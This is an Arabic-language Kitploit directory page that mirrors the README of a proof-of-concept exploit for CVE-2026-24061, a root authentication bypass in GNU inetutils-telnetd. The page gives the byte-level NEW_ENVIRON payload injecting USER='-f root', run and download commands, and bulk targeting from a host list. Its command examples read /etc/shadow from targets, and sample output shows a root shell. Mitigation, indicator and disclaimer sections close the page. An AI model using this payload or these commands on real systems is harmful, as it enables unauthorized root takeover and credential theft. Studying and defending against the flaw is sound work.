Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-24061 — إثبات المفهوم: CVE-2026-24061 هو ثغرة حرجة لتجاوز المصادقة في GNU inetutils-telnetd تسمح للمهاجمين عن بُعد غير المصادق عليهم بالحصول على وصول فوري إلى شل الجذر عبر استغلال خيار telnet الضار NEW_ENVIRON. | Kitploit
أدوات/GitHubGitHub/sh4den/cve-2026-24061
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالأمن الشبكاتاختبار الاختراقالقيادة والسيطرةالمصادقةالأوراق والأبحاثالتعلم والتعليمأداة الوصول عن بعد
GitHubsh4den/cve-2026-24061

CVE-2026-24061

613منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم: CVE-2026-24061 هو ثغرة حرجة لتجاوز المصادقة في GNU inetutils-telnetd تسمح للمهاجمين عن بُعد غير المصادق عليهم بالحصول على وصول فوري إلى شل الجذر عبر استغلال خيار telnet الضار NEW_ENVIRON.

عرض المستودع

CVE-2026-24061

GNU inetutils-telnetd - تجاوز المصادقة عن بُعد

أداة بحث أمني لاستغلال CVE-2026-24061، وهي ثغرة حرجة في تجاوز المصادقة عن بُعد في GNU inetutils-telnetd تسمح بالحصول الفوري على صلاحيات shell الجذرية دون مصادقة.


جدول المحتويات

  • ملخص الثغرة
  • الإصدارات المتأثرة
  • التحليل الفني
  • المتطلبات الأساسية
  • التثبيت
  • الاستخدام
  • مرجع المخرجات
  • منهجية الاستغلال
  • التخفيف والمعالجة
  • مؤشرات الاختراق
  • إخلاء المسؤولية القانوني
  • المراجع
  • الإسناد

ملخص الثغرة

الحقلالقيمة
معرّف CVECVE-2026-24061
درجة CVSS v3.19.8 (حرجة)
متجه CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
تصنيف CWECWE-88: تحييد غير صحيح لمحددات الوسائط في أمر
البائعمشروع GNU
المنتجinetutils-telnetd
تاريخ الإفصاح20 يناير 2026
التصحيح المتاحسيُحدد لاحقًا (TBD)

الملخص التنفيذي

توجد ثغرة حرجة في GNU inetutils-telnetd حتى الإصدار 2.7 تسمح للمهاجمين عن بُعد غير المصادَق عليهم بتجاوز المصادقة بالكامل والحصول فورًا على صلاحيات shell الجذرية. تُستغل الثغرة عبر خيار telnet الجديد NEW_ENVIRON عن طريق حقن متغير بيئة USER مُصمم خصيصًا بالقيمة "-f root"، مما يتجاوز جميع آليات المصادقة.

تقييم التأثير

  • السرية: اختراق كامل لبيانات النظام
  • السلامة: سيطرة كاملة على النظام بصلاحيات الجذر
  • التوافر: احتمالية السيطرة الكاملة على النظام أو رفض الخدمة
  • النطاق: غير متغير - يؤثر الاستغلال فقط على خدمة telnet المعرضة للخطر

الإصدارات المتأثرة

نطاق الإصدارالحالة
<= 2.7معرض للخطر
> 2.7حالة التصحيح غير محددة

التحليل الفني

السبب الجذري للثغرة

تنشأ الثغرة من التحقق غير السليم من متغير البيئة USER في معالج خيار NEW_ENVIRON في telnetd. عند معالجة خيار telnet الجديد NEW_ENVIRON، تفشل خدمة telnetd في تنظيف قيمة متغير USER قبل تمريرها إلى عملية تسجيل الدخول. من خلال تعيين USER إلى "-f root"، يحقن المهاجم وسائط سطر أوامر تُجبر المصادقة على النجاح لمستخدم الجذر دون الحاجة إلى بيانات اعتماد.

ناقل الهجوم

  1. يتصل المهاجم بخدمة telnetd (عادةً المنفذ 23)
  2. أثناء التفاوض على خيارات telnet، يطلب الخادم بيانات NEW_ENVIRON
  3. يرد المهاجم بمتغير البيئة USER مضبوطًا على "-f root"
  4. تتجاوز الوسيطة الخبيثة فحوصات المصادقة
  5. يُمنح shell جذري فوري دون أي مطالبة بكلمة مرور
  6. يتحقق اختراق كامل للنظام

تعقيد الاستغلال

  • المتطلبات الأساسية: وصول شبكي إلى خدمة telnetd المستهدفة
  • المصادقة: غير مطلوبة
  • تفاعل المستخدم: لا شيء
  • تعقيد الهجوم: منخفض

المتطلبات الأساسية

متطلبات النظام

  • بايثون 3.7 أو أعلى
  • اتصال شبكي بمثيلات telnetd المستهدفة
  • صلاحيات كافية لتنفيذ نصوص بايثون

التبعيات

جميع التبعيات جزء من المكتبة القياسية للغة بايثون:


التثبيت

الطريقة 1: باستخدام Git

root@kitploit:~
# Clone the repository
git clone https://github.com/sh4den/CVE-2026-24061.git
cd CVE-2026-24061

# Run the exploit
python3 main.py -u <target_ip>

الطريقة 2: التنزيل المباشر

root@kitploit:~
# Download the exploit
curl -O https://raw.githubusercontent.com/sh4den/CVE-2026-24061/main/main.py

# Make it executable (Linux/macOS)
chmod +x main.py

# Run the exploit
python3 main.py -u <target_ip>

الطريقة 3: التثبيت اليدوي

root@kitploit:~
# Ensure Python 3.7+ is installed
python3 --version

# Download and run
python3 main.py -u <target_ip>

الاستخدام

واجهة سطر الأوامر

root@kitploit:~
Usage:
    python3 main.py -u <target_ip> [-p <port>] [-usr <user>]
    python3 main.py -l <targets_file> [-p <port>] [-usr <user>]
    echo "commands" | python3 main.py -u <target_ip>

Arguments:
    -u          Single target IP address or hostname
    -l          Path to file containing target IPs (one per line)
    -p          Target port (default: 23)
    -usr        User to exploit as (default: root)

استغلال هدف واحد

استغلال مثيل telnetd واحد:

root@kitploit:~
# Basic exploitation (default port 23, user root)
python3 main.py -u 192.168.1.100

# Custom port
python3 main.py -u 192.168.1.100 -p 2323

# Different user
python3 main.py -u 192.168.1.100 -usr admin

وضع تنفيذ الأوامر

تنفيذ الأوامر دون تفاعل:

root@kitploit:~
# Single command
echo "id; whoami; uname -a" | python3 main.py -u 192.168.1.100

# Multiple commands
echo "cat /etc/passwd; cat /etc/shadow" | python3 main.py -u 192.168.1.100

# Command with output redirection
echo "ps aux > /tmp/processes.txt" | python3 main.py -u 192.168.1.100

استغلال أهداف متعددة

استغلال أهداف متعددة من ملف:

root@kitploit:~
python3 main.py -l targets.txt
python3 main.py -l targets.txt -p 2323
python3 main.py -l targets.txt -usr admin

تنسيق ملف الأهداف (targets.txt):

root@kitploit:~
192.168.1.100
192.168.1.101
10.0.0.50
172.16.0.25
telnet.example.com

ملاحظات:

  • هدف واحد في كل سطر
  • عناوين IP أو أسماء مضيفين
  • يتم تجاهل الأسطر الفارغة
  • يتم استغلال الأهداف بشكل متزامن باستخدام threading

مرجع المخرجات

مؤشرات الحالة

نموذج للمخرجات

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║     CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass        ║
║                                                               ║
║  CVSS Score: 9.8 (Critical)                                   ║
║  Impact: Remote Authentication Bypass - Instant Root Shell    ║
║                                                               ║
║          This tool is part of the HGrab Framework.            ║
╚═══════════════════════════════════════════════════════════════╝

[2026-01-23 14:32:15] [INFO] Target: 192.168.1.100:23, User: root
[2026-01-23 14:32:15] [SUCCESS] Connected to 192.168.1.100:23
[2026-01-23 14:32:15] [EXPLOIT] Sent payload: USER='-f root'
[2026-01-23 14:32:15] [INFO] Interactive mode - type commands

# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root

منهجية الاستغلال

عملية التفاوض على بروتوكول Telnet

يستغل هذا النص البرمجي مرحلة التفاوض على بروتوكول telnet:

  1. الاتصال الأولي: يتم إنشاء اتصال TCP بالمنفذ المستهدف
  2. التفاوض على الخيارات: يرسل الخادم أوامر DO/WILL لخيارات telnet المختلفة
  3. الاتفاق على TTYPE: يوافق العميل على إرسال نوع الطرفية (WILL TTYPE)
  4. الاتفاق على TSPEED: يوافق العميل على إرسال سرعة الطرفية (WILL TSPEED)
  5. الاتفاق على NEW_ENVIRON: يوافق العميل على إرسال متغيرات البيئة (WILL NEW_ENVIRON)
  6. التفاوض الفرعي: يطلب الخادم متغيرات البيئة (SB NEW_ENVIRON SEND)
  7. حقن الحمولة: يرسل العميل USER="-f root" في استجابة NEW_ENVIRON
  8. تجاوز المصادقة: يعالج الخادم متغير USER الخبيث
  9. الوصول إلى Shell: يُمنح shell جذري دون مصادقة

بنية الحمولة

root@kitploit:~
# Telnet IAC (Interpret As Command) = 255
# SB (Subnegotiation Begin) = 250
# SE (Subnegotiation End) = 240
# NEW_ENVIRON option = 39

payload = bytes([
    255,        # IAC
    250,        # SB
    39,         # NEW_ENVIRON
    0,          # IS
    0,          # VAR
]) + b"USER" + bytes([1]) + b"-f root" + bytes([
    255,        # IAC
    240         # SE
])

التعامل مع الجلسة التفاعلية

  • تعدد إرسال الإدخال: يستخدم select.select() لمراقبة المقبس (socket) والإدخال القياسي (stdin) في وقت واحد
  • إدخال/إخراج غير محجوب: يتم تكوين المقبس لعمليات غير محجوبة
  • معالجة Telnet: يتم إزالة تسلسلات IAC من المخرجات لعرض نظيف
  • إدارة المهلة: مهلة 30 ثانية لتنفيذ الأوامر

التخفيف والمعالجة

إجراءات فورية

  1. تعطيل telnetd: أوقف خدمة telnetd وعطّلها فورًا

    root@kitploit:~
    # systemd-based systems
    sudo systemctl stop telnetd
    sudo systemctl disable telnetd
    
    # xinetd-based systems
    sudo service xinetd stop
    sudo chkconfig telnet off
    
  2. قواعد جدار الحماية: احظر منفذ telnet (23) على مستوى جدار الحماية

    root@kitploit:~
    # iptables
    sudo iptables -A INPUT -p tcp --dport 23 -j DROP
    
    # firewalld
    sudo firewall-cmd --permanent --remove-service=telnet
    sudo firewall-cmd --reload
    
  3. عزل الشبكة: أزل خدمة telnet من الأنظمة المتصلة بالإنترنت

    • استخدم شرائح الشبكة الداخلية فقط
    • نفّذ قوائم التحكم في الوصول إلى الشبكة (ACLs)

التوصيات طويلة الأمد

حلول بديلة

استخدم SSH بدلاً من Telnet:

root@kitploit:~
# Install OpenSSH server
sudo apt-get install openssh-server  # Debian/Ubuntu
sudo yum install openssh-server      # RHEL/CentOS

# Enable and start SSH
sudo systemctl enable sshd
sudo systemctl start sshd

التحقق بعد التخفيف

root@kitploit:~
# Verify telnetd is not running
sudo netstat -tlnp | grep :23
sudo ss -tlnp | grep :23

# Should return no results if properly disabled

مؤشرات الاختراق

تحليل السجلات

راجع سجلات النظام بحثًا عن الأنماط التالية:

سجلات المصادقة:

root@kitploit:~
# Check for unusual login patterns
sudo grep telnetd /var/log/auth.log
sudo grep telnetd /var/log/secure

# Look for suspicious USER environment variables
sudo grep "USER.*-f" /var/log/auth.log

سجلات الشبكة:

  • اتصالات telnet من عناوين IP غير متوقعة
  • اتصالات بالمنفذ 23 خارج ساعات التشغيل العادية
  • اتصالات متعددة وسريعة بخدمة telnet

آثار النظام

  • عمليات غير متوقعة تعمل بصلاحيات الجذر
  • ملفات تكوين نظام معدلة
  • حسابات مستخدمين غير مصرح بها
  • مفاتيح SSH جديدة في /root/.ssh/authorized_keys
  • مهام cron مشبوهة أو مهام مجدولة

مؤشرات الشبكة

  • اتصالات صادرة من عملية خدمة telnet
  • تسريب بيانات إلى مضيفين خارجيين
  • اتصالات shell عكسية (reverse shell)
  • نشاط فحص منافذ صادر من النظام المخترق
  • محاولات حركة جانبية إلى أنظمة داخلية أخرى

أوامر الكشف

root@kitploit:~
# Check for active telnet connections
sudo netstat -antp | grep :23

# Review recent root logins
sudo last | grep root

# Check for modified system files
sudo rpm -Va  # RHEL/CentOS
sudo debsums -c  # Debian/Ubuntu

# List processes by root
sudo ps aux | grep root

# Check for unauthorized SSH keys
sudo cat /root/.ssh/authorized_keys

إخلاء المسؤولية القانوني

هام: اقرأ قبل الاستخدام

تُقدَّم هذه الأداة حصريًا من أجل:

  • التقييمات الأمنية المصرح بها واختبارات الاختراق
  • الأغراض التعليمية والبحثية في بيئات خاضعة للرقابة
  • عمليات الأمن الدفاعي بتفويض مناسب
  • تقييم ثغرات الأنظمة التي تملكها أو لديك إذن صريح لاختبارها

الاستخدامات المحظورة:

  • الوصول غير المصرح به إلى أنظمة الكمبيوتر أو الشبكات
  • استغلال الأنظمة دون موافقة كتابية صريحة من المالك
  • أي نشاط ينتهك القوانين المحلية أو الحكومية أو الفيدرالية أو الدولية
  • الأنشطة الخبيثة أو اختراق الأنظمة دون إذن

المسؤولية: لا يتحمل مؤلفو هذا البرنامج أو مساهموه أو موزعوه أي مسؤولية عن سوء الاستخدام أو الأضرار أو الأنشطة غير القانونية التي تُنفَّذ باستخدام هذه الأداة. يتحمل المستخدمون وحدهم مسؤولية:

  • ضمان الامتثال لجميع القوانين واللوائح المعمول بها
  • الحصول على التفويض المناسب قبل إجراء الاختبارات الأمنية
  • أي عواقب ناتجة عن استخدام أو سوء استخدام هذا البرنامج

إشعار قانوني: الوصول غير المصرح به إلى أنظمة الكمبيوتر جريمة جنائية خطيرة. قد تؤدي المخالفات إلى الملاحقة القضائية بموجب:

  • Computer Fraud and Abuse Act (CFAA) - United States (18 U.S.C. § 1030)
  • Computer Misuse Act 1990 - United Kingdom
  • توجيه الاتحاد الأوروبي بشأن الهجمات على أنظمة المعلومات
  • تشريعات مماثلة في ولايات قضائية أخرى حول العالم

قد تشمل العقوبات السجن وغرامات مالية كبيرة ومسؤولية مدنية.

باستخدامك لهذه الأداة، فإنك تقر بأنك قرأت وفهمت وتوافق على الامتثال لإخلاء المسؤولية هذا وجميع القوانين المعمول بها.


المراجع

الموارد الرسمية

  • الصفحة الرئيسية لـ GNU Inetutils
  • وثائق GNU Inetutils

معلومات الثغرة

  • NVD - CVE-2026-24061
  • سجل MITRE لـ CVE
  • إفصاح OpenWall (20 يناير 2026)
  • نقاش OpenWall (20 يناير 2026)
  • تحديث OpenWall (22 يناير 2026)

الوثائق ذات الصلة

  • CWE-88: تحييد غير صحيح لمحددات الوسائط
  • مواصفات بروتوكول Telnet (RFC 854)
  • خيار بيئة Telnet (RFC 1408)
  • حقن الأوامر من OWASP

أفضل الممارسات الأمنية

  • إرشادات NIST للوصول عن بُعد
  • معايير CIS
  • موارد SANS الأمنية

الإسناد

  • مؤلف الاستغلال: فريق IRIS C2
  • الإطار البرمجي: جزء من إطار HGrab Framework
  • الاكتشاف: مجتمع البحث الأمني
  • الإفصاح: مساهمو القائمة البريدية OpenWall

سجل التغييرات

الإصدارالتاريخالتغييرات
1.0.02026-01-23الإصدار الأولي

الدعم والتواصل

للأسئلة أو المشكلات أو المساهمات:

  • المشكلات: أبلغ عن الأخطاء أو اطلب ميزات عبر GitHub Issues
  • الأمان: أبلغ عن الثغرات بمسؤولية إلى القائمين على الصيانة
  • المساهمات: طلبات السحب (Pull Requests) مرحب بها

الترخيص

يُقدَّم هذا المشروع كما هو لأغراض البحث الأمني المصرح به والتعليم فقط. لا يتم تقديم أي ضمان، صريحًا كان أم ضمنيًا. استخدمه على مسؤوليتك الخاصة ووفقًا لجميع القوانين واللوائح المعمول بها.

لا تستخدم إلا بتفويض مناسب

تنزيل الأداة
الحزمةالغرض
socketالاتصال الشبكي
selectتعدد الإرسال (I/O multiplexing)
sysالتفاعل مع النظام
osواجهة نظام التشغيل
threadingاستغلال متزامن للأهداف
datetimeتنسيق الطوابع الزمنية
المؤشراللونالوصف
[SUCCESS]أخضرتم الاتصال بالهدف بنجاح
[EXPLOIT]أخضرتم إرسال حمولة الاستغلال بنجاح
[INFO]أزرقرسالة إعلامية حول العملية الحالية
[ERROR]أحمرفشل الاتصال أو انتهاء المهلة أو خطأ في الاستغلال
[WARNING]أصفررسالة تحذيرية (غير مستخدمة حاليًا)
الإجراءالأولويةالوصف
الترحيل إلى SSHحرجةاستبدال telnet بـ SSH للوصول عن بُعد
إدارة التصحيحاتحرجةمراقبة التحديثات الأمنية وتطبيقها
تدقيق الخدماتعاليةتحديد خدمات الشبكة غير الضرورية وتعطيلها
تقسيم الشبكةعاليةعزل الأنظمة الحرجة عن الشبكات العامة
كشف التسللمتوسطةنشر IDS/IPS لكشف محاولات الاستغلال
التحكم في الوصولمتوسطةتنفيذ قوائم بيضاء بعناوين IP للخدمات عن بُعد